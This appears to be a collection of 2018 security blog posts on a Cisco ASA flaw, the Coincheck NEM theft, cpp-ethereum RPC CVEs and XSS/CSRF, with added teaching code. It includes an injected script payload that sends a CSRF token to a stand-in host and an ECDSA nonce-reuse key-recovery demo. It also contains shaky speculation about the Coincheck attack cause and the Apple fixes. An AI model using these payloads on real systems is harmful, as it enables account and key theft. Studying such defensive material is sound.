Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability

Advisory: Cisco Adaptive Security Appliance Remote Code Execution and Denial of Service Vulnerability (see the URL below for reference)

Severity level – critical

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180129-asa1

We hear about denial-of-service vulnerabilities in UTM firewall devices frequently, so on its own this advisory is neither strange nor surprising. However, the XML exploitation method it resembles is not new; a similar technique was presented at the RSA Conference in 2016. The concept is outlined below:

MS XML Exploit

1. Double free memory vulnerability in MSXML3.dll

2. Invokable with IE

3. Validating DTDs (Document Type Definitions) in an XML document

4. Invalid forward ID references

5. Memory occupied by a forward reference object is freed twice

6. Present in older heap manager used

Doubt – the $530 million cryptocurrency heist

As we know, the most common cryptocurrencies are Bitcoin, Ethereum, Ethereum Classic, Monero, Litecoin, OmiseGO, Ripple and Zcash. Fundamentally, the NEM Smart Asset System is considered more secure than Bitcoin. The NEM blockchain uses a Proof-of-Importance algorithm (rather than Bitcoin's Proof-of-Work or PIVX's Proof-of-Stake) to reach consensus through a process that rewards active participation in the network. NEM is a peer-to-peer cryptocurrency and blockchain platform launched on 31 March 2015. But the value of each coin is underestimated. So why did the hackers target NEM? Do you think hackers are willing to take the difficult route?

Information update on 29 January 2018 – CNN reports that this cryptocurrency heist is the biggest on record; a financial loss of this size has not happened before. See the URL below for reference.

http://money.cnn.com/2018/01/29/technology/coincheck-cryptocurrency-exchange-hack-japan/index.html

My speculation – how Coincheck lost ¥58 billion worth of cryptocurrency

Incident background:

The Japan-based company said hackers broke in at 02:57 a.m. local time on Friday (12:57 p.m. EST on Thursday, 25 January).

Financial loss: ¥58 billion worth of cryptocurrency

Cryptocurrency type: NEM (XEM)

Victim: coincheck.com

Historical cyber attack incident record

The previous major cryptocurrency heist happened in February 2014. The victim was Mt. Gox, a bitcoin exchange in Japan; the amount stolen was worth less than ¥48 billion. Coincheck started in August 2014 and is operated by Coincheck, Inc. No similar incident had happened to it in the past.

Coincheck's current cyber defense mechanisms

Coincheck provides two-factor authentication and cold storage.

Remark: cold storage, in the context of Bitcoin, means keeping a reserve of bitcoins offline. Cold storage methods include keeping bitcoins on a USB drive or other storage media, or on a paper wallet.

Coincheck follows the JBA's guidelines to ensure customers can use Coincheck's services securely (for more details, see the URL below for reference).

http://jada-web.jp/wp-content/uploads/2015/01/SummaryofGuidelinesforJADA_v1-0_20141023.pdf

Secure random number generation – Customers don't need to worry about this vulnerability because Coincheck's wallet uses RFC 6979, which derives the ECDSA nonce k deterministically from the private key and the message hash (via HMAC) instead of drawing it from a random number generator, so a weak or repeated "random" nonce cannot leak the signing key.

Remark: RFC 6979 makes ECDSA vulnerable to DPA (differential power analysis) at two levels.

  • The attacker controls every input to the first HMAC step of the RFC except x, the secret key: K = HMAC_K(V || 0x00 || int2octets(x) || bits2octets(h1))
  • s = k⁻¹(h + r·d): k⁻¹ is not known, but it is always the same for the same input
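To make the remark above concrete, here is an added example (not Coincheck's wallet code and not part of the original post) that implements RFC 6979 section 3.2 on NIST P-256 with only the standard library, and then shows the failure it is designed to prevent: if a broken random number generator hands out the same nonce twice, anyone holding the two signatures can compute the private key. The curve constants are the published P-256 parameters; the private key is the RFC 6979 appendix A.2.5 test key; the repeated nonce value and the message strings are constructed for the demonstration.

```python
import hashlib
import hmac

# NIST P-256 domain parameters (published constants).
P = 0xFFFFFFFF00000001000000000000000000000000FFFFFFFFFFFFFFFFFFFFFFFF
A = P - 3
N = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551
G = (0x6B17D1F2E12C4247F8BCE6E563A440F277037D812DEB33A0F4A13945D898C296,
     0x4FE342E2FE1A7F9B8EE7EB4A7C0F9E162BCE33576B315ECECBB6406837BF51F5)
QLEN = N.bit_length()      # 256
RLEN = (QLEN + 7) // 8     # 32 octets
# Private key from RFC 6979 appendix A.2.5 (P-256 test vectors).
RFC_PRIV = 0xC9AFA9D845BA75166B5C215767B1D6934E50C3DB36E89B127B8A622B120F6721

def bits2int(b):
    """RFC 6979 2.3.2: interpret the leftmost QLEN bits as a big-endian integer."""
    v = int.from_bytes(b, "big")
    blen = len(b) * 8
    return v >> (blen - QLEN) if blen > QLEN else v

def int2octets(x):
    return x.to_bytes(RLEN, "big")

def bits2octets(b):
    return int2octets(bits2int(b) % N)

def rfc6979_nonce(priv, msg, hashfunc=hashlib.sha256):
    """RFC 6979 3.2: k is derived from HMAC over (priv, H(msg)); no RNG involved."""
    h1 = hashfunc(msg).digest()
    V = b"\x01" * len(h1)
    K = b"\x00" * len(h1)
    seed = int2octets(priv) + bits2octets(h1)
    K = hmac.new(K, V + b"\x00" + seed, hashfunc).digest()   # step d
    V = hmac.new(K, V, hashfunc).digest()                     # step e
    K = hmac.new(K, V + b"\x01" + seed, hashfunc).digest()   # step f
    V = hmac.new(K, V, hashfunc).digest()                     # step g
    while True:                                               # step h
        T = b""
        while len(T) * 8 < QLEN:
            V = hmac.new(K, V, hashfunc).digest()
            T += V
        k = bits2int(T)
        if 1 <= k < N:
            return k
        K = hmac.new(K, V + b"\x00", hashfunc).digest()      # retry, rarely taken
        V = hmac.new(K, V, hashfunc).digest()

def _ec_add(p1, p2):
    """Affine point addition on P-256; None is the point at infinity."""
    if p1 is None:
        return p2
    if p2 is None:
        return p1
    (x1, y1), (x2, y2) = p1, p2
    if x1 == x2 and (y1 + y2) % P == 0:
        return None
    if p1 == p2:
        lam = (3 * x1 * x1 + A) * pow(2 * y1, -1, P) % P
    else:
        lam = (y2 - y1) * pow(x2 - x1, -1, P) % P
    x3 = (lam * lam - x1 - x2) % P
    return x3, (lam * (x1 - x3) - y1) % P

def _ec_mul(k, point):
    result = None
    while k:
        if k & 1:
            result = _ec_add(result, point)
        point = _ec_add(point, point)
        k >>= 1
    return result

def ecdsa_sign(priv, msg, k):
    """Textbook ECDSA with a caller-supplied nonce k, so a bad RNG can be simulated."""
    e = bits2int(hashlib.sha256(msg).digest())
    r = _ec_mul(k, G)[0] % N
    s = pow(k, -1, N) * (e + r * priv) % N
    return r, s

def ecdsa_verify(pub, msg, sig):
    r, s = sig
    if not (1 <= r < N and 1 <= s < N):
        return False
    e = bits2int(hashlib.sha256(msg).digest())
    w = pow(s, -1, N)
    pt = _ec_add(_ec_mul(e * w % N, G), _ec_mul(r * w % N, pub))
    return pt is not None and pt[0] % N == r

def recover_priv_from_nonce_reuse(msg1, sig1, msg2, sig2):
    """Shared r means shared k: k = (e1-e2)/(s1-s2), priv = (s1*k - e1)/r (mod N)."""
    (r, s1), (r2, s2) = sig1, sig2
    if r != r2:
        raise ValueError("signatures do not share a nonce")
    e1 = bits2int(hashlib.sha256(msg1).digest())
    e2 = bits2int(hashlib.sha256(msg2).digest())
    k = (e1 - e2) * pow((s1 - s2) % N, -1, N) % N
    return (s1 * k - e1) * pow(r, -1, N) % N

if __name__ == "__main__":
    k = rfc6979_nonce(RFC_PRIV, b"sample")
    pub = _ec_mul(RFC_PRIV, G)
    print("RFC 6979 k:", hex(k), "verifies:", ecdsa_verify(pub, b"sample", ecdsa_sign(RFC_PRIV, b"sample", k)))
    bad_k = 0x1234567890ABCDEF   # constructed nonce that a broken RNG hands out twice
    s1, s2 = ecdsa_sign(RFC_PRIV, b"m1", bad_k), ecdsa_sign(RFC_PRIV, b"m2", bad_k)
    print("nonce reuse leaks the key:", recover_priv_from_nonce_reuse(b"m1", s1, b"m2", s2) == RFC_PRIV)
```

Note the trade-off the DPA remark points at: because k is a pure function of (x, h1), the same message is always signed with the same k, which is exactly what closes the nonce-reuse hole for two different messages but also gives a side-channel attacker repeatable traces to average.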

Key factor found in this incident

Yusuke Otsuka, Chief Operating Officer of Coincheck, said the stolen funds were kept in an online 'hot wallet' as opposed to a much more secure offline 'cold wallet'. However, the official spokesman says that bitcoins are stored offline when they are not being traded. Meanwhile, CEO Koichiro Wada said its bitcoins were indeed stored offline but that the more than 5 million NEM coins that were stolen were not.

Observation:

According to the NEM (XEM) platform architecture (refer to the diagram above) and the statement made by the CEO (see below), one hint draws my attention to their internal company network: was there an insider threat in their office?

Quote: “bitcoins were indeed stored offline but that the more than 5 million NEM coins that were stolen were not.”

Speculation:

It looks as though implanting malicious code and then infiltrating malware into the distributed ledger system would not be easy to pull off, since two-factor authentication has been implemented, and therefore each transaction has to be acknowledged by both parties (the exchange and the end user). You could say a hacker can counterfeit the SMS message through an SS7 flaw, but a transaction of this size would wake up the support staff. So I believe the cyber incident this time may have one of the following causes:

  1. A phishing email leading to a web site with cross-site scripting, combined with CSRF token theft, is a popular way to steal user credentials.
  2. An admin console or workstation was infected with malware.
  3. A zero-day was encountered in one of their open source applications.

Summary:

The above assumptions are my speculation based on hearsay and headline news. Let me keep my eyes open and provide status updates to you afterwards.

Reference – information update on 28 January 2018

https://www.japantimes.co.jp/news/2018/01/27/national/cryptocurrency-exchange-coincheck-loses-58-billion-hacking-attack/

https://www.reuters.com/article/us-japan-cryptocurrency/hacked-tokyo-cryptocurrency-exchange-to-repay-owners-425-million-idUSKBN1FH03D


Data Privacy Day 2018 Livestream on 28th Jan 2018

In the last hundred years, the way information is recorded and stored saw no big changes. Then a revolution pushed computer technology into another generation: a computer world of big data and digitization. Cyber attacks wreak havoc today. To avoid missing anything, antivirus vendors have stepped up their defensive techniques: they keep track of your daily activities continuously. Perhaps you and I never empowered a third party to do that kind of job. So what can we do today to protect our personal data privacy?

Data Privacy Day 2018 – live from LinkedIn. The Data Privacy Day 2018 livestream took place on 28 January 2018 (see the URL below for reference).

https://staysafeonline.org/dpd18-live/
cpp-ethereum vulnerabilities – do not ignore!

Preface:

Cyber attacks wreak havoc today. Applications and operating systems can hardly avoid vulnerabilities given their short development cycles. Cryptocurrency might change the financial world, but more and more of its components are still under development.

Technology background

Ethereum is an open software platform based on blockchain technology that enables developers to build and deploy decentralized applications.

What language is Ethereum written in?

There are four official reference implementations (see below):

Go, C++, Python and Java

Non-official but fully working implementations also exist in Rust, Ruby and JavaScript (Solidity, often listed alongside them, is the smart contract language rather than a client implementation). However, Go has design limitations that lead some software developers to decide against using it.

Why has the Go language not been chosen by some software developers?

The question of generics in Go is years old and has been discussed back and forth across the Go forums, newsgroups and mailing lists. Go is a language with an intentionally restricted feature set, and one of the features it leaves out is user-defined generic types and functions.

In short, Go lacks some of the flexibility of traditional programming languages. Perhaps Go libraries work best for scientific computing; a common view is that Go might evolve into the ideal high-performance computing language for scientific use. Therefore some developers prefer other programming languages.

However, the cyber world resembles a dangerous zone. Operating systems, applications and hardware can hardly avoid design weaknesses (vulnerabilities). The situation is like a cancer in the human body: the cancer evolves from a normal human cell.

Vulnerabilities were found in cpp-ethereum at the end of last year. A status update was released on 18 January 2018.

Should you be interested in this topic, please find the details below for reference.

An exploitable improper authorization vulnerability exists in admin_nodeInfo API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12113

An exploitable unhandled exception vulnerability exists in multiple APIs of CPP-Ethereum JSON-RPC. Specially crafted JSON requests can cause an unhandled exception resulting in denial of service.

https://nvd.nist.gov/vuln/detail/CVE-2017-12119

An exploitable improper authorization vulnerability exists in miner_setGasPrice API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12116

An exploitable improper authorization vulnerability exists in miner_setEtherbase API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12115

An exploitable improper authorization vulnerability exists in admin_addPeer API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12112

An exploitable improper authorization vulnerability exists in admin_peers API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12114

An exploitable improper authorization vulnerability exists in miner_stop API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12118

An exploitable improper authorization vulnerability exists in miner_start API of cpp-ethereum’s JSON-RPC

https://nvd.nist.gov/vuln/detail/CVE-2017-12117

An exploitable information leak/denial of service vulnerability exists in the libevm (Ethereum Virtual Machine) `create2` opcode handler of CPP-Ethereum. A specially crafted smart contract code can cause an out-of-bounds read leading to memory disclosure or denial of service.

https://nvd.nist.gov/vuln/detail/CVE-2017-14457
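Seven of the nine CVEs above are the same bug class (a privileged JSON-RPC method callable without authorization) and one is the other recurring class in RPC servers (a malformed request raising an exception nobody catches, which in a C++ server loop terminates the process). The toy dispatcher below is an added example written for this page, not cpp-ethereum's code: it takes the method names from the CVE text, but the node state, the handler bodies, the convention that privileged calls carry an admin session token as their last parameter, and the error codes are all assumptions made for illustration. The vulnerable and hardened dispatchers sit side by side so the two fixes are visible.

```python
import hmac
import json

ADMIN_SESSION = "constructed-admin-session-token"   # constructed secret for this example

# Methods that must never be reachable by an unauthenticated caller.
PRIVILEGED = {
    "admin_nodeInfo", "admin_peers", "admin_addPeer",
    "miner_start", "miner_stop", "miner_setGasPrice", "miner_setEtherbase",
}

class NodeState:
    """Minimal stand-in for a node's mutable settings."""
    def __init__(self):
        self.mining = False
        self.gas_price = 20_000_000_000
        self.etherbase = "0x" + "00" * 20
        self.peers = []

def make_handlers(state):
    def miner_start(params):
        state.mining = True
        return True
    def miner_stop(params):
        state.mining = False
        return True
    def miner_setGasPrice(params):
        state.gas_price = int(params[0], 16)       # IndexError / ValueError on bad input
        return True
    def miner_setEtherbase(params):
        addr = params[0]
        if not (isinstance(addr, str) and addr.startswith("0x") and len(addr) == 42):
            raise ValueError("malformed address")
        state.etherbase = addr
        return True
    def admin_addPeer(params):
        state.peers.append(params[0])
        return True
    def admin_peers(params):
        return list(state.peers)
    def admin_nodeInfo(params):
        return {"mining": state.mining, "peerCount": len(state.peers)}
    def eth_blockNumber(params):
        return "0x0"
    return {f.__name__: f for f in (miner_start, miner_stop, miner_setGasPrice,
                                    miner_setEtherbase, admin_addPeer, admin_peers,
                                    admin_nodeInfo, eth_blockNumber)}

def dispatch_vulnerable(raw, state):
    """Improper authorization plus unhandled exceptions: anyone who can reach the
    port may call privileged methods, and any exception from malformed JSON or bad
    params escapes to the caller (in a C++ server loop: process termination)."""
    req = json.loads(raw)
    handler = make_handlers(state)[req["method"]]
    return {"jsonrpc": "2.0", "id": req["id"], "result": handler(req["params"])}

def dispatch_hardened(raw, state):
    """Validate the request shape, gate privileged methods on the admin session token
    before touching state, and turn every handler failure into a JSON-RPC error."""
    def error(code, message, rid=None):
        return {"jsonrpc": "2.0", "id": rid, "error": {"code": code, "message": message}}
    try:
        req = json.loads(raw)
    except ValueError:
        return error(-32700, "Parse error")
    if not isinstance(req, dict) or req.get("jsonrpc") != "2.0":
        return error(-32600, "Invalid Request")
    rid, method, params = req.get("id"), req.get("method"), req.get("params", [])
    if not isinstance(method, str) or not isinstance(params, list):
        return error(-32600, "Invalid Request", rid)
    handlers = make_handlers(state)
    if method not in handlers:
        return error(-32601, "Method not found", rid)
    if method in PRIVILEGED:
        token = params[-1] if params and isinstance(params[-1], str) else ""
        if not hmac.compare_digest(token.encode(), ADMIN_SESSION.encode()):
            return error(-32000, "Unauthorized", rid)
        params = params[:-1]
    try:
        result = handlers[method](params)
    except (IndexError, TypeError, ValueError) as exc:
        return error(-32602, "Invalid params: " + type(exc).__name__, rid)
    return {"jsonrpc": "2.0", "id": rid, "result": result}
```

A useful check when reviewing any node's RPC surface: send each `admin_*`/`miner_*` method with no credential and with deliberately wrong parameter types, and confirm the server answers with an error object every time rather than changing state or dying.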

Summary:

There were 40,135 transactions on the Ethereum blockchain on 17 May 2017. On 25 January 2018, Ether is trading a bit over $1,050. The value of the cryptocurrency will lure the interest of hackers, and as usual more vulnerabilities or zero-day attacks might follow later on. So make sure you have remediation and mitigation procedures in place if your Ethereum back end is built on the C++ implementation.

CVE-2018-0486 – Staying alert with your single sign-on application, especially IdP vulnerabilities

CVE-2018-0486: the Shibboleth (SAML IdP) open source vulnerability is currently awaiting analysis. For more details, see the URL below for reference:

https://nvd.nist.gov/vuln/detail/CVE-2018-0486

During my penetration test engagements in the past, I was surprised that airline, financial and retail industries alike deploy open source single sign-on components in their online web applications. The incident at Equifax woke the business world up to the fact that open source applications carry inherent risk that can jeopardize your firm's reputation. Now a very popular open source SAML IdP turns out to have a vulnerability. What is your comment? Remark: you can also find the details in the attached picture diagram.

Apple enforces Meltdown and Spectre vulnerability remediation

About Apple's security updates announcement (see the URL below for reference)

https://support.apple.com/en-us/HT208463

The objective of the security updates announcement is to remediate multiple vulnerabilities. As usual, Apple released a security update but no descriptions are available yet, so there is little detail from the vendor. However, I speculated that the remediation would focus on the following protection technique: the ARM Protection Unit (PU).

The advantages of this system are:

• Access control held entirely on-chip (no need for any off-chip tables)

• Provides four levels of access control, cache and write-buffer control

• Separate control over instruction and data caches.

The disadvantages are:

• Small number of regions

• Restrictions on region size and alignment.

As a result, third-party unmanaged apps, especially games, might run into problems!

Lawful interception – how much is your personal privacy worth today?

A cloud computing platform looks like an aircraft carrier in the data world, and the data stored inside the cloud is under the cloud's protection. However, different countries implement different data protection laws and data custodian policies. Perhaps developing countries were unaware of this topic over the last decade, but big data has progressively raised its political profile. It is not easy for government enforcement units to get at data in a cloud farm; at least they must apply for key escrow or a search warrant through official channels (or, you might say, presidential approval can sometimes bypass all the official channels). But how does one monitor billions of mobile phones and computers? Perhaps it is no secret; WikiLeaks blew the whistle on this back in 2014 (see the URLs below for reference). A strange issue drew my attention this year: more antivirus vendors detected FinFisher malware this month (see the attached detail in the picture, left-hand corner). FinFisher customers include law enforcement and government agencies around the world. Do you think a new round of hostile-country surveillance programs is being launched this year?

2014 – WikiLeaks SpyFiles 4

https://wikileaks.org/spyfiles4/index.html

2014 – WikiLeaks releases FinFisher files to highlight government malware abuse (theguardian.com)

https://www.theguardian.com/technology/2014/sep/16/wikileaks-finfisher-files-malware-surveillance

Smart City & IoT – three mandatory principles for working with big data

We frequently hear about smart city projects and the use of big data. The first impression such key terms give people is of an advanced technique and a future technology trend. In fact, we cannot claim to be keen on the benefits of smart cities and big data analytics while ignoring the peripherals. How does a city go about such a setup when starting from scratch? For example, the HKSAR government issued its Smart City Blueprint in the middle of last year, but a whole bunch of questions from the public and from industry are still waiting for answers. Perhaps the objective of the smart city is to enhance public safety and governance of the city, and the career opportunities are a side product of the project. But if the key issues of the city have not yet been resolved (for instance population, immigration policy and land use), then even if you push the project through, it may end up far from its original design objectives.

The URL below is the Smart City Blueprint for HKSAR, for your reference.

https://www.smartcity.gov.hk/blueprint/HongKongSmartCityBlueprint_e-flipbook_EN/mobile/index.html#p=30

Staying alert with CSRF and XSS vulnerabilities

Perhaps there are many vulnerabilities that are sometimes ignored. Why? Take cross-site scripting, which can occur on the client or the server side. If there is a cross-site scripting (XSS) vulnerability in a web application, CSRF (cross-site request forgery) cannot be prevented, since the injected script lets the attacker grab the anti-CSRF token and include it in a forged request. However, XSS and CSRF are only rated medium-risk in the AppScan definitions, so they don't draw the software developers' attention. OnePlus has confirmed that a credit card breach affected up to 40,000 customers. A security researcher found that OnePlus runs the Magento eCommerce platform, and Magento had XSS and CSRF vulnerabilities disclosed in May 2017, with the patch released in September 2017. Do you think XSS and CSRF are the culprits in this credit card data breach? For a status update on the OnePlus credit card data breach, please see the reference below.

OnePlus Confirms Credit Card Breach Impacted Up to 40,000 Customers

Remark: Magento is an open source platform that gives merchants control over their online stores and shopping cart system, as well as tools to improve the visibility and management of the shop.
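To show the interplay described above in working code rather than words, here is an added example written for this page (not OnePlus's or Magento's code). The mini storefront, its synchronizer-token scheme, the origin names and the injected payload are all constructed for illustration; the "browser" is reduced to two helper functions that stand in for HTML parsing and DOM access. Three scenarios are run: a plain cross-site forgery (rejected by the token and Origin checks), a stored-XSS payload that runs on the shop's own origin, reads the token and forges an accepted request, and the same payload against a page that applies output encoding, where the script never executes.

```python
import hmac
import html
import re
import secrets

SITE_ORIGIN = "https://shop.example"   # assumed origin of the storefront

class Session:
    def __init__(self):
        self.csrf_token = secrets.token_hex(16)   # synchronizer token bound to the session
        self.balance = 100

def render_review_vulnerable(review, session):
    """Reflects user input unescaped into a page that also carries the CSRF token."""
    return ('<form action="/transfer" method="post">'
            f'<input type="hidden" name="csrf" value="{session.csrf_token}"></form>'
            f'<p class="review">{review}</p>')

def render_review_fixed(review, session):
    """Same page with contextual output encoding: the payload becomes inert text."""
    return ('<form action="/transfer" method="post">'
            f'<input type="hidden" name="csrf" value="{session.csrf_token}"></form>'
            f'<p class="review">{html.escape(review, quote=True)}</p>')

def script_would_execute(page):
    """Crude stand-in for the browser's HTML parser: a live <script> element is present."""
    return re.search(r"<script\b", page) is not None

def attacker_script_reads_token(page):
    """What injected JavaScript does once it runs in the victim's session: read the
    hidden input from the DOM (here: the served HTML) and hand the token to the attacker."""
    m = re.search(r'name="csrf" value="([0-9a-f]{32})"', page)
    return m.group(1) if m else None

def transfer(session, form, origin):
    """Server-side state-changing endpoint with the usual CSRF defenses:
    constant-time token comparison plus an Origin header check."""
    if not hmac.compare_digest(form.get("csrf", ""), session.csrf_token):
        return "rejected: bad csrf token"
    if origin != SITE_ORIGIN:
        return "rejected: cross-origin request"
    session.balance -= int(form["amount"])
    return "ok"

def run_scenarios():
    """Returns (plain CSRF result, XSS-assisted CSRF result, script runs on fixed page?)."""
    victim = Session()
    payload = "<script>fetch('https://evil.example/?t='+document.forms[0].csrf.value)</script>"
    # 1. Plain CSRF from an attacker-controlled page: no token, foreign origin -> rejected.
    plain = transfer(victim, {"amount": "10"}, "https://evil.example")
    # 2. Stored XSS: the payload runs in the victim's browser on the shop's own origin,
    #    so it can read the token and the forged request arrives looking legitimate.
    page = render_review_vulnerable(payload, victim)
    stolen = attacker_script_reads_token(page) if script_would_execute(page) else None
    via_xss = transfer(victim, {"amount": "10", "csrf": stolen or ""}, SITE_ORIGIN)
    # 3. With output encoding the script never runs, so the token is never exfiltrated.
    fixed = script_would_execute(render_review_fixed(payload, victim))
    return plain, via_xss, fixed

if __name__ == "__main__":
    print(run_scenarios())
```

The lesson for triage is the one the paragraph makes: the anti-CSRF token only holds as long as no attacker script runs in the page's origin, so an XSS finding on a site that handles payment data deserves a higher rating than the scanner's default "medium".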